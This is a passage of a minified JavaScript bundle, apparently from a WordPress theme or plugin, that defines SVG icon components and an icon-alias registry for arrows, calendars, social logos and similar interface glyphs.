9.4c.192.192.192.288.1.479a13.425 13.425 0 0 0-.959 3.74 14.384 14.384 0 0 0 2.3 8.821 20.414 20.414 0 0 0 7.191 6.519 27.739 27.739 0 0 0 12.752 3.069 27.311 27.311 0 0 0 12.464-2.781 19.211 19.211 0 0 0 7.282-5.933c3.068-4.219 3.835-8.725 1.822-13.615a.865.865 0 0 1 .1-.48m-12.656 5.421a3.645 3.645 0 1 1 3.024-3.023 3.646 3.646 0 0 1-3.024 3.023m-.192 8.1a14.556 14.556 0 0 1-9.013 3.26 14.886 14.886 0 0 1-8.533-3.164 1.469 1.469 0 1 1 1.822-2.3 11.081 11.081 0 0 0 7.862 2.493 11.805 11.805 0 0 0 5.369-2.014c.288-.191.479-.383.767-.575a1.488 1.488 0 0 1 2.014.288 1.6 1.6 0 0 1-.288 2.013m-16.683-15.34a3.646 3.646 0 1 1-3.644 3.643 3.526 3.526 0 0 1 3.644-3.643m-12.464.767a4.959 4.959 0 0 1 7.095-6.808 18.573 18.573 0 0 0-7.095 6.808m41.036-.288a18.259 18.259 0 0 0-6.807-6.424c-.1-.1-.192-.1-.288-.192a5.75 5.75 0 0 1 2.4-.959 4.811 4.811 0 0 1 4.794 2.206 4.978 4.978 0 0 1 .1 5.273c0 .1-.1.384-.192.1"})),(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 47.04 48"},(0,o.createElement)("path",{d:"M24 19.625v8.907h13.227a11.731 11.731 0 0 1-4.907 7.786 14.2 14.2 0 0 1-8.32 2.4 14.447 14.447 0 0 1-13.653-9.973 14.764 14.764 0 0 1-.8-4.747 15.523 15.523 0 0 1 .773-4.746A14.507 14.507 0 0 1 24 9.278a13.3 13.3 0 0 1 9.28 3.574l6.773-6.614A23.061 23.061 0 0 0 24-.002a24 24 0 0 0 0 48 22.873 22.873 0 0 0 15.893-5.813c4.534-4.187 7.147-10.347 7.147-17.653a20.536 20.536 0 0 0-.507-4.907Z"}));const n=new class{constructor(){this.icons=new Map,this.aliases=new Map}initializeIcons(e){Object.entries(e).forEach((([e,t])=>{this.icons.set(e,t)}))}storeAliases(e){Object.entries(e).forEach((([e,t])=>{this.icons.has(t)&&this.aliases.set(e,this.icons.get(t))}))}getAliases(){return Object.fromEntries(this.aliases)}toObject(){return{...Object.fromEntries(this.icons),...Object.fromEntries(this.aliases)}}toCurrentIconObj(){return{...Object.fromEntries(this.icons)}}};n.initializeIcons({...i.c,...a.e}),n.storeAliases({angle_bottom_left_line:"arrow_down_bottom_left_solid",angle_bottom_right_line:"arrow_down_bottom_right_solid",angle_top_left_line:"arrow_up_top_left_solid",angle_top_right_line:"arrow_up_top_right_solid",rightFillAngle:"right_triangle_angle_play_arrow_forward_solid",leftAngle2:"arrow_left_previous_backward_chevron_line",rightAngle2:"arrow_right_next_forward_chevron_line",collapse_bottom_line:"arrow_down_dropdown_maximize_chevron_line",arrowUp2:"arrow_up_dropdown_minimize_chevron_line",longArrowUp2:"long_arrow_up_top_increase_solid",arrow_left_circle_line:"arrow_left_backward_circle_line",arrow_bottom_circle_line:"arrow_down_bottom_downward_circle_line",arrow_right_circle_line:"arrow_right_forward_circle_line",arrow_top_circle_line:"arrow_up_top_upward_circle_line",close_circle_line:"cross_close_x_minimize_circle_line",close_line:"cross_x_close_minimize_line",arrow_down_line:"arrow_down_bottom_downward_line",leftArrowLg:"arrow_left_backward_line",rightArrowLg:"arrow_left_forward_line",arrow_up_line:"long_arrow_up_top_increase_line",down_solid:"arrow_down_bottom_downward_circle_solid",right_solid:"arrow_right_forward_circle_solid",left_solid:"arrow_left_backward_circle_solid",up_solid:"arrow_up_top_upward_circle_solid",wrong_solid:"cross_close_x_minimize_circle_solid",bottom_right_line:"arrow_move_up_right_line",bottom_left_line:"arrow_move_up_left_line",top_left_angle_line:"arrow_move_down_left_line",top_right_line:"arrow_move_down_right_line",at_line:"at_a_mail_line",refresh:"refresh_reset_cycle_loop_infinity_line",cart_line:"shopping_cart_line",cart_solid:"add_plus_shopping_cart_solid",cog_line:"settings_tool_function_line",cog_solid:"settings_tool_function_solid",correct_solid:"right_circle_solid",dot_solid:"dot_circle_solid",clock:"clock_reading_time_1_line.svg",book:"book_line",download_line:"download_1_line",download_solid:"download_1_solid",downlod_bottom_solid:"download_1_solid",eye:"view_count_show_visible_eye_open_2_line",hidden_line:"hidden_hide_invisible_line",home_line:"home_house_line",home_solid:"home_house_solid",location_line:"location_gps_map_line",location_solid:"location_gps_map_solid",love_line:"heart_love_wishlist_favourite_line",love_solid:"heart_love_wishlist_favourite_solid",notice_circle_solid:"warning_circle_solid",notice_solid:"warning_triangle_solid",play_line:"play_media_video_circle_line",plus2:"",videoplay:"right_triangle_angle_play_arrow_forward_solid",left_angle_solid:"left_triangle_angle_arrow_backward_solid",caretArrow:"caret_up_top_triangle_angle_arrow_upward_solid",rectangle_solid:"square_rounded_solid",restriction_line:"restriction_no_stop_line",right_circle_line:"correct_save_check_circle_line",save_line:"correct_save_check_line",search_line:"search_magnify_line",search_solid:"search_magnify_solid",triangle_solid:"triangle_shape_solid",warning_circle_line:"warning_circle_line",warning_triangle_line:"warning_triangle_line",upload_solid:"upload_1_solid",cat1:"category_file_documents_1_solid",cat2:"category_book_line",cat3:"category_file_documents_2_line",cat4:"category_file_documents_3_line",cat5:"category_file_documents_3_solid",cat6:"category_file_documents_4_line",cat7:"category_book_line",commentCount1:"messege_comment_1_line",commentCount2:"messege_comment_3_solid",commentCount3:"messege_comment_3_line",commentCount4:"messege_comment_6_line",commentCount5:"messege_comment_7_line",commentCount6:"messege_comment_8_line",comment:"messege_comment_4_line",date1:"calendar_date_4_line",date2:"calendar_date_1_solid",date3:"calendar_date_2_line",date4:"calendar_date_4_solid",date5:"calendar_date_3_line",calendar:"calendar_date_3_line",readingTime1:"clock_reading_time_3_line",readingTime2:"clock_reading_time_2_line",readingTime3:"book_reading_time_line",readingTime4:"clock_reading_time_1_line",readingTime5:"hourglass_timer_time_line",tag1:"tag_bookmark_save_favourite_mark_discount_sale_line",tag2:"price_tag_label_category_sale_discount_solid",tag3:"price_tag_label_category_sale_discount_line",tag4:"price_tag_offer_sale_coupon_solid",tag5:"price_tag_label_category_sale_discount_line",tag6:"growth_increase_up_solid",viewCount1:"view_count_show_visible_eye_open_1_line",viewCount2:"view_count_show_visible_eye_open_2_line",viewCount3:"view_count_show_visible_eye_open_3_line",viewCount4:"view_count_show_visible_eye_open_4_solid",viewCount5:"view_count_show_visible_eye_open_5_solid",viewCount6:"view_count_show_visible_eye_open_5_solid",author1:"author_user_human_1_line",author2:"author_user_human_4_line",author3:"author_user_human_4_solid",author4:"author_user_human_4_line",author5:"author_user_human_3_solid",user:"author_user_human_3_line",desktop:"desktop_monitor_computer_line",laptop:"laptop_computer_line",tablet:"tablet_ipad_pad_line",mobile:"mobile_smartphone_phone_line",angry_line:"angry_emoji_line",angry_solid:"angry_emoji_solid",confused_line:"confused_emoji_line",confused_solid:"confused_emoji_solid",happy_line:"happy_emoji_line",happy_solid:"happy_emoji_solid",smile_line:"smile_emoji_line",smile_solid:"smile_emoji_solid",share_line:"social_community_line",share:"share_social_solid",apple_solid:"apple_logo_icon_solid",android_solid:"android_logo_icon_solid",google_solid:"google_logo_icon_solid",messenger:"messenger_logo_icon_solid",microsoft_solid:"microsoft_logo_icon_solid",mail:"mail_email_messege_solid",media_document:"media_document",facebook:"facebook_logo_icon_solid",twitter:"twitter_x_logo_icon_line",arrowDown2:"arrow_down_dropdown_maximize_chevron_line",setting:"settings_tool_function_solid",right_circle_solid:"correct_save_check_circle_solid",full_screen:"full_screen_corners_out_solid",zoom_in:"zoom_in_magnifying_glass_plus_line",zoom_out:"zoom_out_magnifying_glass_minus_line",gallery_indicator:"gallery_indicator_image_solid",ascending:"sort_ascending_order_line",descending:"sort_descending_order_line",unlink:"unlink_link_break_line",rocket:"rocket_fly_boost_launch_pro_solid",unlock:"unlocked_open_security_solid",connect:"plugin_connect_socket_integration_line",leftAngle:"arrow_left_previous_backward_chevron_line",rightAngle:"right_triangle_angle_play_arrow_forward_line",link:"link_chains_line",subtract:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:"skype_logo_icon_solid",updated_link:"link_chains_line",tiktok_lite_solid:"tiktok_logo_icon_circle_line",tiktok_solid:"tiktok_logo_icon_solid",instagram_solid:"instagram_logo_icon_solid",linkedin:"linkedin_logo_icon_solid",whatsapp:"whatsapp_logo_icon_solid",wordpress_lite_solid:"wordpress_logo_icon_solid",wordpress_solid:"wordpress_logo_icon_2_solid",youtube_solid:"youtube_logo_icon_solid",pinterest:"pinterest_logo_icon_solid",reddit:"reddit_logo_icon_solid",five_star_line:"star_rating_line",rightAngleBold:"arrow_right_next_forward_chevron_line",leftAngleBold:"arrow_left_previous_backward_chevron_line",reset_left_line:"refresh_reset_cycle_loop_infinity_line",hamicon_1:"hamicon_1_line",hamicon_2:"hemicon_2_line",hamicon_3:"hemicon_3_line",hamicon_4:"hamicon_5_line",hamicon_5:"hemicon_2_solid",hamicon_6:"hamicon_6_line"});const r=n.toObject(),s={subtract:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),skype:r.skype_logo_icon_solid,updated_link:r.link_chains_line,facebook:r.facebook_logo_icon_solid,twitter:r.twitter_x_logo_icon_line,tiktok_lite_solid:r.tiktok_logo_icon_circle_line,tiktok_solid:r.tiktok_logo_icon_solid,instagram_solid:r.instagram_logo_icon_solid,linkedin:r.linkedin_logo_icon_solid,whatsapp:r.whatsapp_logo_icon_solid,wordpress_lite_solid:r.wordpress_logo_icon_solid,wordpress_solid:r.wordpress_logo_icon_2_solid,youtube_solid:r.youtube_logo_icon_solid,pinterest:r.pinterest_logo_icon_solid,reddit:r.reddit_logo_icon_solid,google_solid:r.google_logo_icon_solid,link:r.link_chains_line,share:r.share_social_solid},p=n.toCurrentIconObj(),c=r},71900:(e,t,l)=>{"use strict";l.d(t,{e:()=>a});var o=l(67294);const a={add_plus_shopping_cart_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M13.745 7.5v4M11.75 9.505h4"})),android_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.5 9.5a5.5 5.5 0 1 1 11 0V17a2 2 0 0 1-2 2h-7a2 2 0 0 1-2-2V9.5ZM20 11v6M4 11v6"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"m14 4 1.5-2M10 4 8.5 2m-2 8.5h11m-8 8.5v3m5.5-3v3M10.49 8h.01m2.99 0h.01"})),angry_emoji_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 9.5c1 0 2.69.254 2.964 1.231m0 0A.988.988 0 0 1 10 11c0 1.5-2.072-.037-.036-.269ZM17 9.5c-1 0-2.69.254-2.964 1.231m0 0A.99.99 0 0 0 14 11c0 1.5 2.072-.037.036-.269Z"}),(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8 17c1.5-3 6.5-3 8 0"})),apple_logo_icon_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M19.489 8.963c-.114.089-2.127 1.23-2.127 3.768 0 2.936 2.561 3.975 2.638 4-.012.064-.407 1.423-1.35 2.808-.841 1.219-1.72 2.435-3.056 2.435-1.337 0-1.68-.781-3.223-.781-1.504 0-2.039.807-3.261.807-1.223 0-2.075-1.128-3.056-2.512C4.918 17.86 4 15.335 4 12.938 4 9.09 6.484 7.05 8.93 7.05c1.298 0 2.381.859 3.197.859.776 0 1.987-.91 3.465-.91.56 0 2.572.051 3.897 1.963ZM14.59 4.415c.533-.64.91-1.527.91-2.415 0-.123-.01-.248-.033-.349-.867.033-1.9.585-2.522 1.315-.489.561-.945 1.45-.945 2.349 0 .135.022.27.033.314.055.01.144.022.233.022.778 0 1.758-.527 2.323-1.236Z"})),arrow_down_bottom_downward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 13 12 16.5m0 0L8.5 13m3.5 3.5v-9"})),arrow_down_bottom_downward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.5 12 8.5 8.5m0 0 8.5-8.5M12 20.5v-17"})),arrow_down_bottom_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 6v12m0 0h12M6 18 18 6"})),arrow_down_bottom_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 6v12m0 0H6m12 0L6 6"})),arrow_down_dropdown_maximize_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 9 6 6 6-6"})),arrow_left_backward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 15.5 7.5 12m0 0L11 8.5M7.5 12h9"})),arrow_left_backward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20.5 3.5 12m0 0L12 3.5M3.5 12h17"})),arrow_left_forward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m12 20.5 8.5-8.5m0 0L12 3.5m8.5 8.5h-17"})),arrow_left_previous_backward_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m15 18-6-6 6-6"})),arrow_move_down_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 6v3a4 4 0 0 1-4 4H2m0 0 5 5m-5-5 5-5"})),arrow_move_down_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6v3a4 4 0 0 0 4 4h16m0 0-5 5m5-5-5-5"})),arrow_move_up_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M22 18v-3a4 4 0 0 0-4-4H2m0 0 5-5m-5 5 5 5"})),arrow_move_up_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 18v-3a4 4 0 0 1 4-4h16m0 0-5-5m5 5-5 5"})),arrow_right_forward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m13 8.5 3.5 3.5m0 0L13 15.5m3.5-3.5h-9"})),arrow_right_next_forward_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m9 18 6-6-6-6"})),arrow_up_dropdown_minimize_chevron_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m18 15-6-6-6 6"})),arrow_up_top_left_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 18V6m0 0h12M6 6l12 12"})),arrow_up_top_right_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M18 18V6m0 0H6m12 0L6 18"})),arrow_up_top_upward_circle_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 11 12 7.5m0 0 3.5 3.5M12 7.5v9"})),arrow_up_top_upward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 12 12 3.5m0 0 8.5 8.5M12 3.5v17"})),at_a_mail_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 8v7a2 2 0 0 0 2 2 4 4 0 0 0 4-4v-1c0-5.523-4.477-10-10-10S2 6.477 2 12s4.477 10 10 10c1.821 0 3.53-.487 5-1.338M16 12a4 4 0 1 1-8 0 4 4 0 0 1 8 0Z"})),author_user_human_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4.5 20.533A6.533 6.533 0 0 1 11.033 14h1.934a6.533 6.533 0 0 1 6.533 6.533.467.467 0 0 1-.467.467H4.967a.467.467 0 0 1-.467-.467Z"})),author_user_human_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 8a4.5 4.5 0 1 1-9 0 4.5 4.5 0 0 1 9 0Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 20.5a8 8 0 1 0-16 0"})),author_user_human_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 21v-3a4 4 0 0 1 4-4h8a4 4 0 0 1 4 4v3"})),author_user_human_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("circle",{cx:"12",cy:"7",r:"4",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13.5c-3.283 0-6.156 1.585-7.728 3.776C2.984 19.07 4.791 21 7 21h10c2.209 0 4.015-1.93 2.727-3.724C18.155 15.086 15.283 13.5 12 13.5Z"})),book_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.5 18.5v-3.092a3 3 0 0 1 .504-1.664l1.219-1.828a.934.934 0 0 1 1.554 0l1.22 1.828a3 3 0 0 1 .503 1.664V18.5m-5-2.5h5"})),book_reading_time_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M7 19h9M4 19V7a3 3 0 0 1 3-3h3M4 19a3 3 0 0 0 3 3h11M4 19a3 3 0 0 1 3-3h11v-4"}),(0,o.createElement)("circle",{cx:"14.5",cy:"7.5",r:"5.5",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 5v3l2 1"})),calendar_date_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18M8 13.5h.01M8 17h.01M12 13.5h.01M12 17h.01M16 13.5h.01M16 17h.01"})),calendar_date_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15v16a2 2 0 0 1-2 2H8a2 2 0 0 1-2-2v-1.5"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 3h15l-3.595 13.032a2 2 0 0 1-1.928 1.468H3.313a1 1 0 0 1-.964-1.266L6 3Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 13.5 12.5 8l-2 1m-1 4.5h3m4-12-.5 3m-2.5-3-.5 3m-2.5-3-.5 3"})),calendar_date_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM8 2v3m8-3v3M3 9h18"})),calendar_date_4_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5.5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2v-14ZM7.5 2v3M12 2v3m4.5-3v3M8 13.5h.01M8 10h.01M8 17h.01M12 13.5h.01M12 10h.01M12 17h.01M16 13.5h.01M16 10h.01M16 17h.01"})),caret_up_top_triangle_angle_arrow_upward_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.8 6.067a1 1 0 0 0-1.6 0l-7 9.333A1 1 0 0 0 5 17h14a1 1 0 0 0 .8-1.6l-7-9.333Z"})),category_book_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 5v14a3 3 0 0 0 3 3h13V8H7a3 3 0 0 1-3-3Zm0 0a3 3 0 0 1 3-3h13M7 5h10"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 11h-5v3h5M7.5 15.5h3m-3 3h3"})),category_file_documents_1_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.5 7H5a2 2 0 1 1 0-4h16v6.5L19.5 11v7h-3"}),(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5v16h13.5V7m-10 7.5h3m-3 3h3"})),category_file_documents_2_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 20h16a1 1 0 0 0 1-1V8a1 1 0 0 0-1-1H6a1 1 0 0 0-1 1v12Zm0 0H4a2 2 0 0 1-2-2V6a2 2 0 0 1 2-2h11.172a2 2 0 0 1 1.414.586L19 7"})),category_file_documents_3_line:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M21 20H6a1 1 0 0 1-1-1v-8a1 1 0 0 1 1-1h7.586a1 1 0 0 0 .707-.293l2.414-2.414A1 1 0 0 1 17.414 7H21a1 1 0 0 1 1 1v11a1 1 0 0 1-1 1Z"}),(0,o.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M20 7V5a1 1 0 0 0-1-1h-3.586a1 1 0 0 0-.707.293l-2.414 2.414a1 1 0 0 1-.707.293H3a1 1 0 0 0-1 1v9a1 1 0 0 0 1 